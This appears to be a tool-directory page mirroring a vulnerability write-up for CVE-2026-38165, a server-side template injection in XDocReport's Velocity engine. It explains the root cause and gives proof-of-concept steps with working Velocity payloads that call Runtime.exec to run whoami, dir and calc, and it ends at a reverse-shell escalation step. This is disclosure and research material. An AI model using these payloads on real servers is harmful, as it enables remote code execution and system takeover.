Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-38165-SSTI- — CVE-2026-38165 (SSTI) | Kitploit
Tools/GitHubGitHub/at190510-cuong/cve-2026-38165-ssti-
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & EducationPayload Development
GitHubat190510-cuong/cve-2026-38165-ssti-

CVE-2026-38165-SSTI-

CVE-2026-38165 (SSTI)

View Repository
1443 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-38165 (SSTI Velocity)

Server-Side Template Injection (SSTI) in XDocReport allows Remote Code Execution via Apache Velocity engine

Bug Definition

Overview of the vulnerability

  • Server-Side Template Injection (SSTI) is a web security vulnerability that allows attackers to inject malicious code into templates used by Content Management Systems (CMS) and web frameworks, aiming to conduct remote attacks, harvest sensitive information, or perform system intrusion activities.

  • SSTI is a variant of Injection vulnerabilities (such as SQL Injection, XSS, etc.), where attackers exploit the use of template systems to deploy malicious code remotely. When an SSTI attack is successfully executed, attackers can run their own code on the server-side, enabling them to conduct remote attacks, such as collecting sensitive information, performing system intrusion activities, and accessing unauthorized resources.

  • SSTI vulnerabilities often occur due to the use of insecure template systems, or due to a failure to validate and process input parameters before inserting them into templates. If an SSTI attack is successful, the consequences can be severe, causing significant damage to the affected organization.

Business Impact

  • The SSTI vulnerability can cause several serious consequences, including:

  • Remote Code Execution: Attackers can use this vulnerability to execute malicious code on the server, allowing them to steal data, perform illegal actions on the system, or even take full control of the server.

  • Sensitive Information Disclosure: SSTI can allow attackers to read, modify, or delete files on the server. If these files contain sensitive information, such as usernames and passwords, attackers can easily expose this information.

  • Phishing or Social Engineering Attacks: Attackers can use SSTI to conduct phishing or social engineering attacks by altering website content or adding fake custom buttons. If users click on these buttons, attackers can steal user information or install malware on their computers.

Severity CRITICAL

image

Description and Impact

fr.opensagres.xdocreport.template.velocity

A Server-Side Template Injection (SSTI) vulnerability was found in OpenSAGRES XDocReport when processing DOCX templates with the velocity engine. Under certain configurations, crafted templates can lead to Remote Code Execution (RCE).

The HR management website allows users to upload .docx document files to the system. During processing, the application uses the Velocity template engine (at the file) to render content without any mechanism to control or filter input content. This vulnerability allows an attacker to inject malicious expressions into the .docx file (template), leading to Remote Code Execution (RCE) on the server, which can be exploited to steal information or take control of the system.

Affected component

fr.opensagres.xdocreport.template.velocity — XDocReport (versions =< 2.1.0).

Root cause analysis

https://github.com/opensagres/xdocreport/blob/master/template/fr.opensagres.xdocreport.template.velocity/src/main/java/fr/opensagres/xdocreport/template/velocity/internal/VelocityTemplateEngine.java

image

velocityEngine.evaluate(...) is the standard/"default" method of Apache Velocity to evaluate a template from a Reader (or from a String) using a Context and writing to a Writer. It executes VTL (Velocity Template Language) syntax just like Template.merge(...)

Actual difference between evaluate and Template.merge

  • evaluate: parses from Reader/String → convenient when template is dynamic/untrusted.
  • getTemplate(...).merge(...): loads a template that has been processed by the resource loader (caching, encoding...), then merges. In terms of VTL execution capability, both execute the same expressions; the main difference is in the location/method of template loading.

Step to reproduce

  1. The user uploads a .docx file with the following payload inside:

image

#set($x="abc")
#set($str=$x.getClass().forName("java.lang.String"))
#set($cha=$x.getClass().forName("java.lang.Character"))
#set($r=$x.getClass().forName("java.lang.Runtime").getRuntime().exec("whoami"))
$r.waitFor()
#set($out=$r.getInputStream())
#set($result="")
#foreach($i in [1..$out.available()])
#set($result = $result + $str.valueOf($cha.toChars($out.read())))
#end
$result

image

  1. Observe that system commands can be executed successfully

image

  1. Similarly, with the following payload:
#set($x="abc")
#set($str=$x.getClass().forName("java.lang.String"))
#set($cha=$x.getClass().forName("java.lang.Character"))
#set($r=$x.getClass().forName("java.lang.Runtime").getRuntime().exec("cmd /c dir d:"))
$r.waitFor()
#set($out=$r.getInputStream())
#set($result="")
#foreach($i in [1..$out.available()])
#set($result = $result + $str.valueOf($cha.toChars($out.read())))
#end
$result

image

image

image

  1. Similarly
#set($x="abc")
#set($str=$x.getClass().forName("java.lang.String"))
#set($cha=$x.getClass().forName("java.lang.Character"))
#set($r=$x.getClass().forName("java.lang.Runtime").getRuntime().exec("calc"))
$r.waitFor()
#set($out=$r.getInputStream())
#set($result="")
#foreach($i in [1..$out.available()])
#set($result = $result + $str.valueOf($cha.toChars($out.read())))
#end
$result

image

image

  1. Escalate impact to RCE
  • The listener machine is WSL with IP address 172.26.208.130

image

  • Exploit with the following payload:
Download Tool